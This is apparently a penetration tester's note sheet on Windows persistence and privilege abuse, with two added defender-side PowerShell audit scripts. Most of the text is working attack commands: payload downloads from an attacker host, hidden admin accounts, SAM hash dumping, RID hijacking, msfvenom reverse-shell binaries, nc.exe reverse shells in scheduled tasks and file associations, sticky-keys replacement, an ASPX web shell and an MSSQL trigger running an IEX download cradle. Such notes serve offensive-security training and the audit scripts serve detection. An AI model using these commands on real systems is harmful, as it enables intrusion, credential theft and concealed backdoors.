# Persistence

* Gained through
  * Startup folder persistence
  * Editing registry keys
  * Scheduled tasks
  * SUID
  * BITS
  * Creating a backdoored service
  * Creating a user
  * RDP

## Gain Persistence on Windows

* Browser: add the attacker host to the trusted sites so the download is not blocked.
* PowerShell
```sh
Invoke-WebRequest http://<ip>:<port>/shell.exe -OutFile .\shell2.exe
```
* DOS prompt
```cmd
certutil -urlcache -split -f http://<ip>:<port>/<file> "C:\Users\<user>\AppData\Roaming\backdoor.exe"
```

### Background Intelligent Transfer Service (BITS)

* Create a job, queue the download, then register a command that BITS runs once the transfer completes:
```sh
bitsadmin /create __shell__
bitsadmin /addfile __shell__ "http://<ip>:<port>/shell2.exe" "C:\Users\<user>\Documents\shell2.exe"
```
```sh
bitsadmin /SetNotifyCmdLine __shell__ cmd.exe "/c bitsadmin /complete __shell__ | start /B C:\Users\<user>\Documents\shell2.exe"
bitsadmin /SetMinRetryDelay __shell__ 30
bitsadmin /resume __shell__
```
* The job name is required on every `bitsadmin` call. BITS jobs survive reboots and keep retrying until the download succeeds, and the notify command runs in the job owner's context, so the job itself is the persistence.

## Elevate Privileges

* Create a user: `net user <user> <password> /add`
* Add it to the local admin group: `net localgroup administrators <user> /add`
* Check: `net localgroup administrators`

### More stealthy

* The `Backup Operators` group is less conspicuous: its members are not administrators, but they can read and write any file on the host.
```sh
net localgroup "Backup Operators" <user> /add
net localgroup "Remote Management Users" <user> /add
```
* Membership of `Backup Operators` grants two privileges:
  * `SeBackupPrivilege`: read any file, regardless of its ACL
  * `SeRestorePrivilege`: write any file, regardless of its ACL
* `Remote Management Users` is what lets the account log in over WinRM at all.
* When a local account logs in remotely (WinRM, RDP), UAC token filtering strips the privileged groups from its token, so the privileges above are not usable in that session.
* Therefore disable the filtering by setting `LocalAccountTokenFilterPolicy` to `1`:
```sh
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /t REG_DWORD /v LocalAccountTokenFilterPolicy /d 1
```
* Afterwards, reconnect and check that `Backup Operators` is listed and enabled in `whoami /groups` (and `SeBackupPrivilege` in `whoami /priv`).
* Back up the `SAM` and `SYSTEM` hives (`reg save` uses backup semantics, so it works with `SeBackupPrivilege`), pull them to the attacker box (`download` is the evil-winrm command) and extract the hashes:
```sh
reg save hklm\system system.bak
reg save hklm\sam sam.bak
download system.bak
download sam.bak
secretsdump.py -sam sam.bak -system system.bak LOCAL
```
* Pass-the-hash with the Administrator NT hash via evil-winrm.

### secedit

* Alternative to group membership: grant the backup/restore privileges to the user directly in the local security policy.
* Export the policy and open it:
```sh
secedit /export /cfg config.inf
```
* Append the user to the two privilege lines (they are comma-separated lists; keep the existing entries):
```sh
SeBackupPrivilege = [...],<user>
SeRestorePrivilege = [...],<user>
```
* Import the file into a database and apply it:
```sh
secedit /import /cfg config.inf /db config.sdb
secedit /configure /db config.sdb /cfg config.inf
```
* Give the user remote access: either add it to `Remote Management Users` with `net localgroup` as before, or grant it access to the PowerShell remoting endpoint:
```sh
Set-PSSessionConfiguration -Name Microsoft.PowerShell -showSecurityDescriptorUI
```
* In the dialog: Add the user -> Full Control (All Operations)
* Set `LocalAccountTokenFilterPolicy` to `1` as in the previous section.

### Relative ID (RID)

* The RID is the last component of a SID and plays the role of the UID on Linux
* The built-in Administrator has `RID = 500`
* Other interactive users get `RID >= 1000`
* List users and SIDs:
```sh
wmic useraccount get name,sid
```
* Assign RID `500` to a regular user: the SAM hive is only readable by SYSTEM, so open regedit as SYSTEM
```sh
PsExec64.exe -i -s regedit
```
* Open `HKLM\SAM\SAM\Domains\Account\Users\<0xRID>`, where the subkey name is the user's RID in hexadecimal (e.g. RID 1001 is `000003E9`)
* Open the binary value called `F` and change the effective RID at offset `0x30`
* The RID is stored as a 32-bit little-endian integer: 500 decimal is `0x01F4`, so the two bytes at `0x30` become `F4 01`
* The change takes effect on the user's next logon; the account is then treated as the Administrator (RID 500) while its name and password stay the same

## Add to registry

* Execute on every interactive logon by appending to the `Userinit` value (comma-separated; keep `Userinit.exe` first or logons break):
```sh
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /d "Userinit.exe, C:\yadda\shell2.exe" /f
```

## Add a Service

### Meterpreter

* Inside meterpreter: `load powershell`, then `powershell_shell`
```sh
New-Service -Name "" -BinaryPathName "" -Description "" -StartupType "Automatic"
```
* `Boot` and `System` start types are for drivers; a Win32 service has to use `Automatic` (or `Manual`/`Disabled`).

### PowerShell

* Start a service automatically. The binary does not have to be a real service: the SCM terminates a plain executable after a timeout because it never reports back, but the command still runs on every boot
```sh
sc.exe create SteamUpdater binPath= "net user Administrator Passwd123" start= auto
sc.exe start SteamUpdater
```
* Better: use a service PE, which talks to the SCM and keeps running
```sh
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT -f exe-service -o SteamUpdater.exe
```
* Modify an existing service instead of creating one
* Enumerate all services, including stopped ones (`sc.exe` needs the space after `=`)
```sh
sc.exe query state= all
```
* Info about a specific service; good candidates have `START_TYPE: AUTO_START` and a `SERVICE_START_NAME` of the target user (or `LocalSystem`)
```sh
sc.exe qc <service>
```
* Reconfigure it
```sh
sc.exe config FoundService binPath= "C:\Windows\SteamUpdater.exe" start= auto obj= "LocalSystem"
sc.exe start FoundService
```

## Add Scheduled Task

```powershell
$A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\Users\Administrator\Documents\rshell.exe"
$B = New-ScheduledTaskTrigger -AtLogOn
$C = New-ScheduledTaskPrincipal -UserId "NT AUTHORITY\SYSTEM" -RunLevel Highest
$D = New-ScheduledTaskSettingsSet
$E = New-ScheduledTask -Action $A -Trigger $B -Principal $C -Settings $D
Register-ScheduledTask ReverseShell -InputObject $E
```
* Alternatively via `schtasks`, here every minute as SYSTEM
```sh
schtasks /create /sc minute /mo 1 /tn SteamUpdater /tr "c:\windows\temp\nc.exe -e cmd.exe $ATTACKER_IP $ATTACKER_PORT" /ru SYSTEM
```
* Check the task
```sh
schtasks /query /tn SteamUpdater
```
* Deleting the security descriptor (SD) of a task makes it invisible: `schtasks /query` and the Task Scheduler UI no longer list it, but it keeps running.
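Added example for the scheduled-task section, not code from the original notes: it registers a logon-triggered SYSTEM task with the same shape as the `Register-ScheduledTask` snippet above and then audits the task cache for tasks whose `SD` value is gone, which is the check a defender wants for the hiding trick described here. The task name and payload path are placeholders chosen for this example; run it from an elevated PowerShell.

```powershell
# Added example (not from the original notes). Run from an elevated PowerShell.
# Placeholders for this demo: the task name and the payload path.
$TaskName    = 'SteamUpdater'                                 # assumption: demo task name
$PayloadPath = 'C:\Users\Administrator\Documents\rshell.exe'  # assumption: demo payload path

function Register-LogonTask {
    # Same shape as the notes' task: cmd.exe /c <payload>, at logon, as SYSTEM, highest run level.
    param([string]$Name, [string]$Payload)
    $action    = New-ScheduledTaskAction -Execute 'cmd.exe' -Argument "/c `"$Payload`""
    $trigger   = New-ScheduledTaskTrigger -AtLogOn
    $principal = New-ScheduledTaskPrincipal -UserId 'NT AUTHORITY\SYSTEM' -RunLevel Highest
    Register-ScheduledTask -TaskName $Name -Action $action -Trigger $trigger -Principal $principal -Force | Out-Null
}

function Get-TasksWithoutSD {
    # Every registered task has a subkey under TaskCache\Tree holding an Id (GUID) and an SD
    # (security descriptor) value. Folder keys carry no Id, so the Id check skips them.
    # A task whose SD was deleted is no longer returned by schtasks /query or
    # Get-ScheduledTask, but its Tree entry (and its Id) is still there.
    $tree = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree'
    Get-ChildItem -Path $tree -Recurse | ForEach-Object {
        $names = $_.GetValueNames()
        if (($names -contains 'Id') -and -not ($names -contains 'SD')) {
            [pscustomobject]@{
                TaskPath = $_.Name.Substring($_.Name.IndexOf('\Tree\') + 5)   # e.g. \SteamUpdater
                Id       = $_.GetValue('Id')
            }
        }
    }
}

Register-LogonTask -Name $TaskName -Payload $PayloadPath
Get-ScheduledTask -TaskName $TaskName | Select-Object TaskName, State   # visible while the SD exists
Get-TasksWithoutSD                                                       # expected to return nothing on a clean host
```

`Get-TasksWithoutSD` reads the registry directly rather than asking the Task Scheduler service, which is the point: the service is what stops listing a task once its SD is missing. Deleting the SD requires SYSTEM, so the audit only finds tasks an attacker already had SYSTEM to hide; pair it with a baseline of the `Id` values so new entries stand out as well.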
* To hide a task this way, delete the `SD` value under its entry in the task cache (requires SYSTEM, e.g. regedit through `PsExec64.exe -i -s`):
```sh
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\<TaskName>\SD
```

## File Backdoor

### Mimic PE

* Inject the payload into a legitimate binary: `-x` is the template, `-k` keeps the template's original behaviour (the payload runs in a separate thread), `-b "\x00"` avoids null bytes
```sh
msfvenom -a x64 --platform windows -x putty.exe -k -p windows/x64/shell_reverse_tcp lhost=$ATTACKER_IP lport=$ATTACKER_PORT -b "\x00" -f exe -o puttyX.exe
```

### Reference Script

* Repurpose an application's shortcut so it references a reverse shell script
* Right click -> `Properties` -> `Target`
* Point the target at the script `certainlynobackdoor.ps1`:
```sh
powershell.exe -WindowStyle hidden C:\Windows\System32\certainlynobackdoor.ps1
```
* Content of `certainlynobackdoor.ps1`; the second line starts the program the user expected, so nothing looks off
```powershell
Start-Process -NoNewWindow "c:\tools\nc.exe" "-e cmd.exe $ATTACKER_IP $ATTACKER_PORT"
C:\Windows\System32\calc.exe
```
* Keep the shortcut's icon and name; only the target changes.

### File Association

* File types under `HKLM\Software\Classes\` map an extension to a `ProgID` (e.g. `.txt` to `txtfile`)
* The ProgID's `shell\open\command` subkey holds the command used to open the file, with the file path passed as the first argument `%1`
* Change the command to a script that launches the payload and then hands the argument to the real program
```powershell
Start-Process -NoNewWindow "c:\windows\temp\nc.exe" "-e cmd.exe $ATTACKER_IP $ATTACKER_PORT"
C:\Windows\system32\NOTEPAD.EXE $args[0]
```
* Set the `(Default)` value of `command` to `powershell -windowstyle hidden C:\windows\temp\steamupdater.ps1 %1`

## Persistence via Logon

### Startup directories

* Per-user Startup directory
```sh
C:\Users\<user>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
```
* Startup directory for all users (needs admin rights); put the reverse shell here so it runs for whoever logs in
```sh
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
```

### Registry Keys

* `HKCU\Software\Microsoft\Windows\CurrentVersion\Run`
* `HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce`
* `HKLM\Software\Microsoft\Windows\CurrentVersion\Run`
* `HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce`
* Create an `Expandable String Value` (`REG_EXPAND_SZ`) under any of these keys with the path of the reverse shell as data. `HKCU` keys fire only for that user and need no admin rights, `HKLM` keys fire for every user, and `RunOnce` entries are deleted after they run.
* `HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\` controls what is loaded for the user profile
after authentication is done
* Either the `Shell` or the `Userinit` value can be extended with an extra comma-separated command (see the `reg add` example above)

### Logon Scripts

* `userinit.exe` checks the environment variable `UserInitMprLogonScript`, which can be used to load a logon script
* Create a string value `UserInitMprLogonScript` under `HKCU\Environment` whose data is the path of the reverse shell; it is per-user and needs no admin rights

## RDP or Login Screen

### Sticky Keys

* Pressing Shift five times runs `C:\Windows\System32\sethc.exe`, also on the login screen, where it runs as SYSTEM
* Take ownership of the binary (it belongs to TrustedInstaller) and grant yourself full control
```sh
takeown /f c:\Windows\System32\sethc.exe
icacls C:\Windows\System32\sethc.exe /grant Administrator:F
```
* Overwrite it with `cmd.exe`
```sh
copy c:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe
```

### Utilman

* The Ease of Access button on the login screen runs `utilman.exe` as SYSTEM
* Take ownership and overwrite it with `cmd.exe` the same way
```sh
takeown /f c:\Windows\System32\utilman.exe
icacls C:\Windows\System32\utilman.exe /grant Administrator:F
copy c:\Windows\System32\cmd.exe C:\Windows\System32\utilman.exe
```
* Both replacements are trivially caught by comparing the file hash with `cmd.exe`, and Windows updates may restore the original binaries.

## Web Shell

* The default IIS application pool identity is `iis apppool\defaultapppool`
* It has `SeImpersonatePrivilege`, which is what the potato-family privilege escalation tools abuse
* [Download Web Shell](https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmdasp.aspx)
* Copy the shell to `C:\inetpub\wwwroot` on the target
* Reach it via `http://$TARGET_IP/shell.aspx`

## MSSQL

* Triggers bind actions to DML events such as `INSERT`, so a trigger can run a command whenever the application writes a row
* Open Microsoft SQL Server Management Studio
* Choose Windows authentication
* `New Query`
* Enable `xp_cmdshell` (it is hidden behind the advanced options):
```sql
sp_configure 'Show Advanced Options',1;
RECONFIGURE;
GO
sp_configure 'xp_cmdshell',1;
RECONFIGURE;
GO
```
* Let every login impersonate `sa`, so the trigger runs as `sa` no matter which account the application connects with:
```sql
USE master
GRANT IMPERSONATE ON LOGIN::sa to [Public];
```
* Switch to the application database:
```sql
USE <db>
```
* Create the trigger:
```sql
CREATE TRIGGER [sql_backdoor]
ON HRDB.dbo.Employees
FOR INSERT AS
EXECUTE AS LOGIN = 'sa'
EXEC master..xp_cmdshell 'Powershell -c "IEX(New-Object net.webclient).downloadstring(''http://ATTACKER_IP:8000/evilscript.ps1'')"';
```
* Fire it by using the web site: its `INSERT` into `Employees` fires the trigger, which runs the download cradle through `xp_cmdshell`
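Added example, not part of the original notes: a read-only, defender-side sweep of the logon and login-screen persistence locations listed under Persistence via Logon and RDP or Login Screen above (Run/RunOnce keys, the Winlogon `Userinit` and `Shell` values, `UserInitMprLogonScript`, both Startup folders, and `sethc.exe`/`utilman.exe` replaced by `cmd.exe`). Run it elevated so the HKLM keys and every profile's Startup folder are readable. The stock values it compares `Userinit` and `Shell` against are assumptions for this example; Run key entries are listed for review rather than flagged, since many are legitimate.

```powershell
# Added example (not from the original notes): read-only sweep of the persistence
# locations named in the notes. Run elevated. Each finding is one object.

function Get-RunKeyEntries {
    # Run / RunOnce under HKCU and HKLM; every value here executes at logon.
    # Listed for review, not flagged: most entries on a workstation are legitimate.
    $keys = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
            'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
            'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
            'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce'
    foreach ($k in $keys) {
        if (-not (Test-Path $k)) { continue }
        $item = Get-Item $k
        foreach ($name in $item.GetValueNames()) {
            [pscustomobject]@{ Check = 'RunKey'; Location = $k; Name = $name; Value = $item.GetValue($name) }
        }
    }
}

function Test-WinlogonValues {
    # Userinit and Shell are comma-separated lists; anything past the stock entry
    # (assumed defaults: userinit.exe and explorer.exe) is an extra program at logon.
    $wl = Get-Item 'HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon'
    $defaults = @{ Userinit = "$env:SystemRoot\system32\userinit.exe"; Shell = 'explorer.exe' }
    foreach ($name in $defaults.Keys) {
        $parts = ([string]$wl.GetValue($name)).Split(',') | ForEach-Object { $_.Trim() } | Where-Object { $_ }
        $extra = $parts | Where-Object { $_ -ne $defaults[$name] }
        if ($extra) {
            [pscustomobject]@{ Check = 'Winlogon'; Location = $wl.Name; Name = $name; Value = ($extra -join ', ') }
        }
    }
}

function Test-LogonScriptVariable {
    # UserInitMprLogonScript does not exist on a stock system; its presence is the finding.
    $envKey = Get-Item 'HKCU:\Environment'
    if ($envKey.GetValueNames() -contains 'UserInitMprLogonScript') {
        [pscustomobject]@{ Check = 'LogonScript'; Location = $envKey.Name; Name = 'UserInitMprLogonScript'
                           Value = $envKey.GetValue('UserInitMprLogonScript') }
    }
}

function Get-StartupFolderItems {
    # All-users Startup folder plus every profile's own one.
    $folders = @("$env:ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp")
    $folders += Get-ChildItem "$env:SystemDrive\Users" -Directory | ForEach-Object {
        Join-Path $_.FullName 'AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'
    }
    foreach ($f in $folders) {
        if (-not (Test-Path $f)) { continue }
        Get-ChildItem $f -File -Force | Where-Object Name -ne 'desktop.ini' | ForEach-Object {
            [pscustomobject]@{ Check = 'StartupFolder'; Location = $f; Name = $_.Name; Value = $_.FullName }
        }
    }
}

function Test-AccessibilityBinaries {
    # sethc.exe / utilman.exe overwritten with a copy of cmd.exe carry cmd.exe's hash
    # and its version-info OriginalFilename; either one is enough to flag.
    $cmd     = "$env:SystemRoot\System32\cmd.exe"
    $cmdHash = (Get-FileHash $cmd -Algorithm SHA256).Hash
    foreach ($bin in 'sethc.exe', 'utilman.exe') {
        $path = "$env:SystemRoot\System32\$bin"
        $hash = (Get-FileHash $path -Algorithm SHA256).Hash
        $orig = (Get-Item $path).VersionInfo.OriginalFilename
        if ($hash -eq $cmdHash -or $orig -like 'cmd*') {
            [pscustomobject]@{ Check = 'AccessibilityBinary'; Location = $path; Name = $bin; Value = "sha256=$hash original=$orig" }
        }
    }
}

$findings = @(Get-RunKeyEntries) + @(Test-WinlogonValues) + @(Test-LogonScriptVariable) +
            @(Get-StartupFolderItems) + @(Test-AccessibilityBinaries)
$findings | Format-Table Check, Name, Value -AutoSize
```

The checks deliberately read the registry and the file system themselves instead of trusting higher-level APIs, the same way the task-cache audit does for scheduled tasks: the attacker techniques on this page work precisely because the normal UI surfaces (Task Scheduler, the login screen, Explorer) show nothing unusual. Each function returns objects, so the sweep can be scheduled and diffed against a baseline rather than read by eye.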